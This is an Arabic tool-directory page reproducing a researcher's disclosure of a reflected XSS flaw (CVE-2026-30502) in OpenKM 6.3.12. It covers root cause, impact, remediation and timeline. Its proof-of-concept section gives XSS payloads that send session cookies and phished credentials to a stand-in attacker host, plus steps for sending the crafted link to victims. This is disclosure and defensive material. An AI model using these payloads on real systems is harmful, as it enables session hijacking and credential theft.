Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS — وثائق وإثبات المفهوم لـ CVE-2026-30502، وهي ثغرة XSS منعكسة في OpenKM v6.3.12. تتضمن تحليلًا تقنيًا، السبب الجذري، تقييم التأثير، وإرشادات المعالجة للباحثين في الأمن ومختبرَي الاختراق. | Kitploit
أدوات/GitHubGitHub/dharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss
أدوات التصيدتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالأوراق والأبحاثالتعلم والتعليم
GitHubdharmstm/cve-2026-30502-openkm-6.3.12-reflected-xss

CVE-2026-30502-OpenKM-6.3.12-Reflected-XSS

وثائق وإثبات المفهوم لـ CVE-2026-30502، وهي ثغرة XSS منعكسة في OpenKM v6.3.12. تتضمن تحليلًا تقنيًا، السبب الجذري، تقييم التأثير، وإرشادات المعالجة للباحثين في الأمن ومختبرَي الاختراق.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

🛡️ CVE-2026-30502 — XSS منعكس في OpenKM الإصدار 6.3.12

CVE Badge OpenKM Type Disclosure Status

تم اكتشافه وإبلاغه بواسطة Dharmendra Kumar — باحث أمني

الأمن السيبراني | اختبار الاختراق | أبحاث الثغرات | الإفصاح المسؤول


📌 جدول المحتويات

  • نظرة عامة
  • تفاصيل CVE
  • المنتج المتأثر
  • وصف الثغرة
  • تحليل السبب الجذري
  • تقييم التأثير والمخاطر
  • إثبات المفهوم (PoC)
  • المعالجة والتوصيات
  • الجدول الزمني للإفصاح
  • المراجع
  • حول الباحث

🔍 نظرة عامة

يوثق هذا المستودع الإفصاح المسؤول عن CVE-2026-30502، وهي ثغرة Cross-Site Scripting (XSS) منعكس تم تحديدها في OpenKM الإصدار 6.3.12 — وهو نظام إدارة مستندات مفتوح المصدر يستخدم على نطاق واسع في بيئات المؤسسات والحكومات.

توجد الثغرة في معامل Content، الذي يعكس إدخال المستخدم مرة أخرى إلى المتصفح دون تنقية أو ترميز مناسب. يمكن للمهاجم صياغة رابط ضار يحتوي على نصوص JavaScript مضمنة وخداع الضحية للنقر عليه، مما يؤدي إلى تنفيذ البرنامج النصي داخل جلسة المتصفح الخاصة بالضحية.

⚠️ الخطورة: متوسط–مرتفع | متجه الهجوم: شبكة | الامتيازات المطلوبة: لا شيء | تفاعل المستخدم: مطلوب


📋 تفاصيل CVE


📦 المنتج المتأثر

OpenKM هو نظام إدارة مستندات مفتوح المصدر ومجاني يوفر واجهة ويب لإدارة وتدقيق وتوزيع مستندات الأعمال. يُستخدم من قبل المؤسسات والهيئات الحكومية والمؤسسات التعليمية في جميع أنحاء العالم.

  • اسم المنتج: نظام إدارة المستندات OpenKM
  • الإصدار المتأثر: v6.3.12
  • موقع البائع: https://www.openkm.com
  • الفئة: نظام إدارة المستندات (DMS)
  • اللغة / البيئة التقنية: Java (JSP / Spring Framework)

🧨 وصف الثغرة

تم تحديد ثغرة Cross-Site Scripting (XSS) منعكس في OpenKM الإصدار 6.3.12 عبر معامل Content. يفشل التطبيق في التحقق من صحة أو ترميز الإدخال الذي يقدمه المستخدم قبل عكسه في نص استجابة HTTP، مما يسمح بحقن نصوص JavaScript تعسفية وتنفيذها في متصفح الضحية.

على عكس XSS المخزن، لا يتم تخزين حمولة XSS المنعكس في قاعدة البيانات — بل تحمل داخل رابط مصمم. يعتمد الهجوم على خداع الضحية للنقر على رابط ضار (يتم تسليمه عبر البريد الإلكتروني أو وسائل التواصل الاجتماعي أو حملات التصيد)، وبعدها يتم تنفيذ الحمولة بصمت في المتصفح بسياق جلسة الضحية.

تدفق الهجوم

root@kitploit:~
مهاجم يصمم رابطًا ضارًا
        │
        ▼
ضحية تنقر على الرابط (تصيد / هندسة اجتماعية)
        │
        ▼
المتصفح يرسل طلب GET/POST مع الحمولة في معامل `Content`
        │
        ▼
OpenKM يعكس الإدخال غير المنقى مباشرة في استجابة HTML
        │
        ▼
المتصفح يوزع وينفذ JavaScript المحقون
        │
        ▼
اختطاف الجلسة / سرقة بيانات الاعتماد / اختراق الحساب

🔬 تحليل السبب الجذري

تنتج الثغرة عن فشل التطبيق في فرض ضوابط أمان الإدخال والإخراج على معامل Content:

root@kitploit:~
رابط من صنع المستخدم ──► معامل Content ──► [لا تحقق]
       ──► منعكسة في استجابة HTML ──► [لا ترميز]
              ──► المتصفح ينفذ البرنامج النصي ──► اختراق الحساب

💥 تقييم التأثير والمخاطر

يمكن أن يؤدي استغلال هذه الثغرة بنجاح إلى:


🧪 إثبات المفهوم (PoC)

⚠️ إخلاء مسؤولية: المعلومات التالية مشتركة بدقة للأغراض التعليمية وبحث الأمن السيبراني وفقًا لمبادئ الإفصاح المسؤول. لا تختبر أو تستخدم هذا ضد أنظمة لا تملكها أو لديك إذن كتابي صريح بتقييمها.

أمثلة الحمولة (عامة)

root@kitploit:~
// Basic execution proof
<script>alert('CVE-2026-30502 - XSS by Dharmendra Kumar')</script>

// Session cookie exfiltration
<script>document.location='https://attacker.example.com/steal?c='+document.cookie</script>

// Credential phishing overlay
<script>
  var d=document.createElement('div');
  d.innerHTML='<form action="https://attacker.example.com/log" method="POST">'
    +'<input name="u" placeholder="Username"/>'
    +'<input name="p" type="password" placeholder="Password"/>'
    +'<button>Sign In</button></form>';
  document.body.prepend(d);
</script>

بنية الرابط الضار المصمم

root@kitploit:~
https://target-openkm-instance/[vulnerable-endpoint]?Content=<script>alert(1)</script>

خطوات إعادة الإنتاج

  1. تحديد نقطة النهاية الضعيفة في OpenKM الإصدار 6.3.12 التي تعكس معامل Content
  2. تصميم رابط بإلحاق حمولة XSS بمعامل Content
  3. ترميز الحمولة بالـ URL إذا لزم الأمر
  4. إرسال الرابط المصمم إلى ضحية عبر البريد الإلكتروني أو الدردشة أو أي ناقل هندسة اجتماعية
  5. عندما تفتح الضحية الرابط في جلسة متصفحها الموثقة، يتم تنفيذ الحمولة
  6. ملاحظة تنفيذ JavaScript أو سرقة الكعكات أو سلوك إعادة التوجيه

🛠️ المعالجة والتوصيات

للمطورين / البائعين

لمسؤولي الأنظمة

  • 🔒 تقييد الوصول إلى OpenKM على الشبكات الداخلية/الموثوقة عبر قواعد جدار الحماية
  • 🛡️ نشر جدار حماية لتطبيقات الويب (WAF) مع تواقيع كشف XSS كإجراء تعويضي
  • 📊 مراقبة سجلات الوصول لخادم الويب بحثًا عن علامات برنامج نصي غير متوقعة أو حمولات مشفرة في سلاسل الاستعلام
  • 🔄 الحفاظ على تثبيت OpenKM محدثًا إلى أحدث إصدار آمن
  • 📧 تدريب المستخدمين على توخي الحذر عند النقر على روابط غير مرغوب فيها إلى نظام DMS

📅 الجدول الزمني للإفصاح

اتبعت مبادئ الإفصاح المسؤول الكاملة خلال هذه العملية، بما في ذلك التنسيق مع البائع والمشاركة مع برنامج CVE قبل أي إصدار عام.


📚 المراجع

  • 🔗 إدخال MITRE CVE — CVE-2026-30502
  • 🔗 NVD — قاعدة بيانات الثغرات الوطنية
  • 🔗 موقع OpenKM الرسمي
  • 🔗 ورقة غش OWASP للوقاية من XSS
  • 🔗 CWE-79: Cross-site Scripting
  • 🔗 OWASP Top 10 — A03:2021 Injection
  • 🔗 OWASP Java Encoder

👨‍💻 حول الباحث

Dharmendra Kumar

باحث أمني | مختبر اختراق | صائد ثغرات | مساهم في CVE

Dharmendra Kumar هو باحث أمن سيبراني مستقل متخصص في أمن تطبيقات الويب واختبار الاختراق والإفصاح المسؤول عن الثغرات. يركز بحثه على تحديد الثغرات الأمنية الواقعية في البرامج واسعة الاستخدام والإبلاغ عنها بمسؤولية — مما يساهم في تطبيقات أكثر أمانًا للمستخدمين عالميًا.

مجالات الخبرة:

  • 🌐 اختبار اختراق تطبيقات الويب
  • 🐛 صيد مكافآت الثغرات وأبحاث CVE
  • 🔍 اكتشاف الثغرات وتقارير الأمان
  • 📋 الإفصاح المسؤول وإبلاغ CVE المنسق

تواصل معي:

GitHub LinkedIn Twitter Instagram Medium


⚖️ إخلاء مسؤولية قانوني

هذا المستودع مخصص فقط للأغراض التعليمية والإعلامية. يتم نشر تفاصيل الثغرة وحمولات إثبات المفهوم وفقًا لمبادئ الإفصاح المسؤول. لا يؤيد المؤلف أو يتحمل مسؤولية أي استخدام غير مصرح به لهذه المعلومات. احصل دائمًا على إذن كتابي صريح قبل إجراء اختبار أمان على أي نظام لا تملكه.


🙏 شكر وتقدير

شكر خاص لـ:

  • فريق تطوير OpenKM على تعاونهم واستجابتهم أثناء الإفصاح المنسق
  • برنامج CVE لـ MITRE لتعيين وإدارة معرف CVE
  • مجتمع أبحاث الأمن ومكافآت الثغرات العالمي لرفع مستوى أمان التطبيقات باستمرار

⭐ إذا ساعدك هذا البحث، يرجى التفكير في وضع نجمة على هذا المستودع.

أبحاث أمنية مشتركة علنًا لجعل الويب أكثر أمانًا للجميع.

© 2026 Dharmendra Kumar — جميع الحقوق محفوظة

تنزيل الأداة
الحقلالتفاصيل
معرف CVECVE-2026-30502
المنتجOpenKM
الإصدار المتأثرv6.3.12
فئة الثغرةCross-Site Scripting (XSS) منعكس
المعامل الضعيفContent
CWECWE-79: تحييد غير صحيح للإدخال أثناء إنشاء صفحة الويب
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
الخطورةمتوسط–مرتفع
الناشربرنامج CVE لـ MITRE
الباحثDharmendra Kumar
نوع الإفصاحمسؤول / منسق
الضعفالوصف
❌ لا يوجد التحقق من صحة الإدخاليقبل معامل Content أحرف HTML/JavaScript الخام دون قيود أو تصفية
❌ لا يوجد ترميز للمخرجاتتُكتب القيم المنعكسة في استجابة HTML دون ترميز كيانات HTML
❌ عدم وجود رأس CSPلا يتم فرض سياسة أمان المحتوى لمنع تنفيذ البرامج النصية المضمنة
❌ عدم وجود كعكات HTTPOnlyرموز الجلسة يمكن الوصول إليها عبر JavaScript، مما يسمح بسرقة الكعكات مباشرة
المخاطرةالوصف
🍪 اختطاف الجلسةسرقة رموز الجلسة النشطة عبر document.cookie لانتحال شخصية الضحية
🔑 حصاد بيانات الاعتمادحقن طبقات تسجيل دخول مزيفة لالتقاط أسماء المستخدمين وكلمات المرور النصية
📤 الكشف عن المعلوماتتسريب محتوى المستندات الحساسة أو بيانات المستخدم أو التكوينات الداخلية
🎣 هجمات التصيدتقديم صفحات مزيفة مقنعة مستضافة داخل نطاق OpenKM الموثوق
👤 الاستيلاء على الحسابتنفيذ إجراءات مصادقة تعسفية نيابة عن الضحية
⚙️ إجراءات غير مصرح بهاتعديل أو حذف أو تسريب المستندات داخل نظام DMS
🖥️ توزيع البرامج الضارةتوجيه الضحايا إلى مواقع يتحكم فيها المهاجم تستضيف تنزيلات ضارة
التوصيةالتنفيذ
✅ التحقق من صحة الإدخالرفض أو تجريد أحرف HTML الخاصة (<, >, ", ', ;) من جميع المعاملات التي يتحكم فيها المستخدم
✅ ترميز المخرجاتتطبيق ترميز HTML مدرك للسياق باستخدام مكتبات مثل OWASP Java Encoder قبل عرض البيانات المنعكسة
✅ سياسة أمان المحتوىنشر رأس CSP صارم: Content-Security-Policy: default-src 'self'; script-src 'self'
✅ كعكات HTTPOnlyتعيين علامات HttpOnly و Secure على جميع كعكات الجلسة لمنع الوصول عبر JavaScript
✅ مكتبات الأماندمج OWASP AntiSamy أو DOMPurify لتنقية قوية
✅ الترقيةتطبيق أحدث تصحيح أمني من البائع فورًا
التاريخالحدث
🔍 الاكتشافتم تحديد الثغرة أثناء تقييم أمني لـ OpenKM الإصدار 6.3.12
📧 إخطار البائعتقديم تقرير الإفصاح المسؤول إلى فريق أمان OpenKM
🤝 إقرار البائعفريق OpenKM أقر بتقرير الثغرة
📝 تعيين CVEتم تعيين CVE-2026-30502 عبر برنامج CVE لـ MITRE
🌐 الإفصاح العامإفصاح عام منسق بعد فترة المعالجة